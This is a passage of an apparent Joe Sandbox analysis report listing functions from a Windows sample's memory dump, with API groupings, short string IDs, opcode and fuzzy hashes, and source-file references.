                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                          • String ID:
                                                                                          • API String ID: 2625713937-0
                                                                                          • Opcode ID: c45599d3bc9fc7debef7ab567c3c0eb4022d53e70f819905b21d88790cde579c
                                                                                          • Instruction ID: 221831dad4dd6453c7ef8e3245c8ea490f09685998a893fc7e7b50c5ed4e0877
                                                                                          • Opcode Fuzzy Hash: c45599d3bc9fc7debef7ab567c3c0eb4022d53e70f819905b21d88790cde579c
                                                                                          • Instruction Fuzzy Hash: CB014021E0C647DAE758BB10F998338A761AF497A0F984634C89D07170FF7EA0848620
                                                                                          Function 00007FF74D061DA0 Relevance: 7.5, APIs: 5, Instructions: 31threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorExitLastThread
                                                                                          • String ID:
                                                                                          • API String ID: 1611280651-0
                                                                                          • Opcode ID: 99fd53b48de60ad2b3b37300d72bcddb8f2580f530d7a1e219e10e2618182fab
                                                                                          • Instruction ID: f278db3b8098133aae24bbe056621edd725d9e3a8999f7f8bd2fe24e05828ce5
                                                                                          • Opcode Fuzzy Hash: 99fd53b48de60ad2b3b37300d72bcddb8f2580f530d7a1e219e10e2618182fab
                                                                                          • Instruction Fuzzy Hash: E7012C21F0C646D2EA047B60A44823CA2A1EF44B75F941B35C6BE036F5EF3CE8688321
                                                                                          Function 00007FF74D0A03F8 Relevance: 7.5, APIs: 5, Instructions: 26threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
                                                                                          • String ID:
                                                                                          • API String ID: 179993514-0
                                                                                          • Opcode ID: 3c9aaefa71688af513bcff76e9269722b622f20c654f000aa95846671475ad7f
                                                                                          • Instruction ID: 0009ed61b7daac061c716aa913a17028c1e73b85d5df1becae43bf59303faf98
                                                                                          • Opcode Fuzzy Hash: 3c9aaefa71688af513bcff76e9269722b622f20c654f000aa95846671475ad7f
                                                                                          • Instruction Fuzzy Hash: D5F01510F1C61AC2FB143BB6A89D37892527F9D741FC45830C88A07366FD2DE4998630
                                                                                          Function 00007FF74D0AB5D4 Relevance: 7.5, APIs: 5, Instructions: 26threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
                                                                                          • String ID:
                                                                                          • API String ID: 179993514-0
                                                                                          • Opcode ID: e2ae8e70be2f5b84d83463abcc11da4b251e2e09d7ca6408d5f9779cbd984f2d
                                                                                          • Instruction ID: 076233897f3cf05fc467450b4140bdb8276d721cb43fd65ea49bb1d85ac02193
                                                                                          • Opcode Fuzzy Hash: e2ae8e70be2f5b84d83463abcc11da4b251e2e09d7ca6408d5f9779cbd984f2d
                                                                                          • Instruction Fuzzy Hash: B2F03914F1C60AC2FB543BB6A85D378A2526F9D741FC45838C98A073B1FD7DE4998670
                                                                                          Function 00007FF74D0B5F2C Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 300comCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateFullInitializeInstanceNamePathUninitialize
                                                                                          • String ID: .lnk
                                                                                          • API String ID: 3769357847-24824748
                                                                                          • Opcode ID: e9a41c1307533edd4d22b0f8b30ca28bda216ecff893dec0b295dcafc10e7183
                                                                                          • Instruction ID: 1acdddbabd244e0d001faba4914e353b144b14cc5b089abd970eb94901b18071
                                                                                          • Opcode Fuzzy Hash: e9a41c1307533edd4d22b0f8b30ca28bda216ecff893dec0b295dcafc10e7183
                                                                                          • Instruction Fuzzy Hash: CAD14B36B1CA56C6EB10FF66D0902BD67B0EB49F88B844032DE8D47B65EE39D845C360
                                                                                          Function 00007FF74D070040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 205COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                          • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                          • API String ID: 3215553584-1196891531
                                                                                          • Opcode ID: c3c6110ef47f8474b3aee38d103288009a94a732d54534d718fbbb8757739500
                                                                                          • Instruction ID: 74e033dc9d59e2b357518c288d7f6daf1f3a78a0b5f4afb7bf735437c93559bf
                                                                                          • Opcode Fuzzy Hash: c3c6110ef47f8474b3aee38d103288009a94a732d54534d718fbbb8757739500
                                                                                          • Instruction Fuzzy Hash: B581CE73F0C202C6FB64BF95965027DA6B0AF11784FD48235DA8E5B6A4FB2DE850C221
                                                                                          Function 00007FF74D05B1E8 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 150COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                          • String ID: $*
                                                                                          • API String ID: 3215553584-3982473090
                                                                                          • Opcode ID: e1993591883a1ee4d578272befcf29134d05160a5f94b748d186053ef0cddf2b
                                                                                          • Instruction ID: 9daa647238a09166ff7a00e87dea2745098a10df01aa0afb08e069b76bcdbd0d
                                                                                          • Opcode Fuzzy Hash: e1993591883a1ee4d578272befcf29134d05160a5f94b748d186053ef0cddf2b
                                                                                          • Instruction Fuzzy Hash: EB61417290C242CAE765FF24806537CBBA0EB45B18FA61135DECA572A9EF68F441C721
                                                                                          Function 00007FF74D066148 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 144COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: _set_statfp
                                                                                          • String ID: !$acos
                                                                                          • API String ID: 1156100317-2870037509
                                                                                          • Opcode ID: 0d89aa78777a41b63d954a76095aee346a1dbdd639e7adc8a9fc006d5894d638
                                                                                          • Instruction ID: 6099259c3fd5d964e4bd6978f79552da7b5bbb120ae7596467a98c4bd1805ca8
                                                                                          • Opcode Fuzzy Hash: 0d89aa78777a41b63d954a76095aee346a1dbdd639e7adc8a9fc006d5894d638
                                                                                          • Instruction Fuzzy Hash: CF61CA21D2CF4AC4E223FB755811276D754BF9A3D1F918336E99E37A74EF2DA0824610
                                                                                          Function 00007FF74D066408 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 138COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: _set_statfp
                                                                                          • String ID: !$asin
                                                                                          • API String ID: 1156100317-2188059690
                                                                                          • Opcode ID: dda4458e7c1e859fb838f80da50bdd89987d805c8091ebd73b4f99c53429eb29
                                                                                          • Instruction ID: 7c0ffd8fad960dccade6359fe94d80ecc636e300fc0a8162fdfcc1fdb24fa55b
                                                                                          • Opcode Fuzzy Hash: dda4458e7c1e859fb838f80da50bdd89987d805c8091ebd73b4f99c53429eb29
                                                                                          • Instruction Fuzzy Hash: 6161D522D2CF86C5E213BB755811376D754BF9A3C0F908332E99E37A75EF2DA0828610
                                                                                          Function 00007FF74D09EAC0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 127windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                          • String ID: @
                                                                                          • API String ID: 4150878124-2766056989
                                                                                          • Opcode ID: 8590b3572ee50005f206f958431262ef9082a01c97b701578a5c0a82d3af5d25
                                                                                          • Instruction ID: c47b9ccec2c746318c6cc6855a835eef80b400cd3296cdef7e40ba642f82dd5b
                                                                                          • Opcode Fuzzy Hash: 8590b3572ee50005f206f958431262ef9082a01c97b701578a5c0a82d3af5d25
                                                                                          • Instruction Fuzzy Hash: 6E519C7661C681D2D720EB92E484AAEF761F7C8B84F841035EE8D53B69EE7CE505CB10
                                                                                          Function 00007FF74D0AA6BC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Menu$Delete$InfoItem
                                                                                          • String ID: P
                                                                                          • API String ID: 135850232-3110715001
                                                                                          • Opcode ID: 7a885196f2dcceb0a8221e88f5e4acf8149e86b4233e81131ef081c483961346
                                                                                          • Instruction ID: cb4e2ed7468171535da46f455ed9ae996324437169aea4180f402ee318868319
                                                                                          • Opcode Fuzzy Hash: 7a885196f2dcceb0a8221e88f5e4acf8149e86b4233e81131ef081c483961346
                                                                                          • Instruction Fuzzy Hash: 5E418322A0CA81C1EB51FB15D4443ADA761EB94BA4F968231DAAD477E1EF3CD542C730
                                                                                          Function 00007FF74D06EAA8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                          • String ID: U
                                                                                          • API String ID: 2456169464-4171548499
                                                                                          • Opcode ID: 94b35a9ebb8fe33294e0bdd0e775bf8e0988a6ef2a86fc1225fbcd9ba36526fe
                                                                                          • Instruction ID: 60221ec5999a93c7d07ce03e6f2d65139dba9dd376a41a2b6b3abc1b0eb03243
                                                                                          • Opcode Fuzzy Hash: 94b35a9ebb8fe33294e0bdd0e775bf8e0988a6ef2a86fc1225fbcd9ba36526fe
                                                                                          • Instruction Fuzzy Hash: 6B418F22B1D745C2DB20AF65E4443AAB7A1FB88794F848031EE8E877A8EF7CD441C750
                                                                                          Function 00007FF74D0DB454 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 96COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$Long
                                                                                          • String ID: SysTreeView32
                                                                                          • API String ID: 847901565-1698111956
                                                                                          • Opcode ID: efcadc7bc094786019cbc8bf8bf3fbcf06e95b4321d3c984f5b6707381f7f713
                                                                                          • Instruction ID: 2cd84c145f9003b02bec2385add7c38cca59bcefa95879f35b271584f2b208da
                                                                                          • Opcode Fuzzy Hash: efcadc7bc094786019cbc8bf8bf3fbcf06e95b4321d3c984f5b6707381f7f713
                                                                                          • Instruction Fuzzy Hash: 9D413E32A0D782C7E770AB18E444B9AB7A1F784764F544335DAA803AA9DF3CD845CF50
                                                                                          Function 00007FF74D0DAB9C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$Window$CreateObjectStock
                                                                                          • String ID: SysMonthCal32
                                                                                          • API String ID: 2671490118-1439706946
                                                                                          • Opcode ID: fd789cdfff50be9b4411109bcad662b9f9b7c83045e67513290be4d4cd92b5f4
                                                                                          • Instruction ID: da0da1028e1fa92c4256598b274460a0ff197e4d9f530613c8b32beec2c0572f
                                                                                          • Opcode Fuzzy Hash: fd789cdfff50be9b4411109bcad662b9f9b7c83045e67513290be4d4cd92b5f4
                                                                                          • Instruction Fuzzy Hash: CC415C3260C6C2CBE370EF15E444B5AB7A1FB88790F504225EAE903A99EF3DD4858F40
                                                                                          Function 00007FF74D0DB798 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$Window$CreateDestroyObjectStock
                                                                                          • String ID: msctls_updown32
                                                                                          • API String ID: 1752125012-2298589950
                                                                                          • Opcode ID: 74e3ad92c2baccfb6081841c4f4ce29bd6f6c1edab28d3e774f2eecd82cc7261
                                                                                          • Instruction ID: 0aa83c7e3712fe1e33f321fcb66effc7376b85456a563542e8d68676ac42a498
                                                                                          • Opcode Fuzzy Hash: 74e3ad92c2baccfb6081841c4f4ce29bd6f6c1edab28d3e774f2eecd82cc7261
                                                                                          • Instruction Fuzzy Hash: DF319F32A1CB85C6EB60EB15E4543AAB361FB85B91F908136DA8D43BA4DF3CD444CB10
                                                                                          Function 00007FF74D0DA1F0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 79windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$Window$CreateMoveObjectStock
                                                                                          • String ID: Listbox
                                                                                          • API String ID: 3747482310-2633736733
                                                                                          • Opcode ID: 4629ce28c24575fa998f22937708fe0feac1f339ddb28addb223e5ca3634c4d7
                                                                                          • Instruction ID: 562104d6a106c33aa548e613304c14c8dff233ba0cdbbc824ee85b0ead8648a4
                                                                                          • Opcode Fuzzy Hash: 4629ce28c24575fa998f22937708fe0feac1f339ddb28addb223e5ca3634c4d7
                                                                                          • Instruction Fuzzy Hash: 3731193660C6C1C6E770EF16B448A5AB7A1F7887A0F504625EAE913BA9DB3DD481CF10
                                                                                          Function 00007FF74D0B4DF8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorMode$InformationVolume
                                                                                          • String ID: %lu
                                                                                          • API String ID: 2507767853-685833217
                                                                                          • Opcode ID: 672d97fc72a5ca8b35a6a563d603e89b9dfb37273f5f93e5ec3f9e9d545e6ea4
                                                                                          • Instruction ID: 28d7297f1da6517e6c8a2fba1deeb5235b4dd7defcf021ec9101417bc5db85dc
                                                                                          • Opcode Fuzzy Hash: 672d97fc72a5ca8b35a6a563d603e89b9dfb37273f5f93e5ec3f9e9d545e6ea4
                                                                                          • Instruction Fuzzy Hash: F6313A7260CB86C6DB10FB16E4802ADB7A1FB89BC0F804435EA8D47B65EF78D595C710
                                                                                          Function 00007FF74D0DB104 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
